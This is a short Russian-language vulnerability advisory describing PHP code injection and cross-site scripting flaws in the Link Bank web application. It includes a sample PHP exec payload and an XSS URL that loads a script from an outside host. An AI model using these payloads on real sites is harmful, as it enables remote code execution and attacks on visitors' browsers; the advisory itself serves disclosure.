Навигация
Главная »  Интернет 

Межсайтовый скриптинг и PHP-инклюдинг в Link Bank


Программа: Link Bank, возможно более ранние версии
Опасность: Критическая
Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах url_name и url во время добавления ссылки. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP код на целевой системе с привилегиями Web сервера. Пример:

<?php exec($cmd) ?>

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре site сценария iframe.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://example.com/iframe.php?site=%3C/title%3E%3C/head
%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E

URL производителя: daverave.64digits.com/index.php?page=linkbank

Решение: Способов устранения уязвимости не существует в настоящее время.

 

 В чем суть Perl 6.
 CTI внедрила корпоративную систему IP-телефонии для Яндекса.
 Вышло обновление ICQ 5.1.
 Microsoft проиграла битву против IBM и Sun.
 Российские ученые направили письмо Путину о запрете зарубежного ПО.


Главная »  Интернет 

© 2017 Team.Furia.Ru.
Частичное копирование материалов разрешено.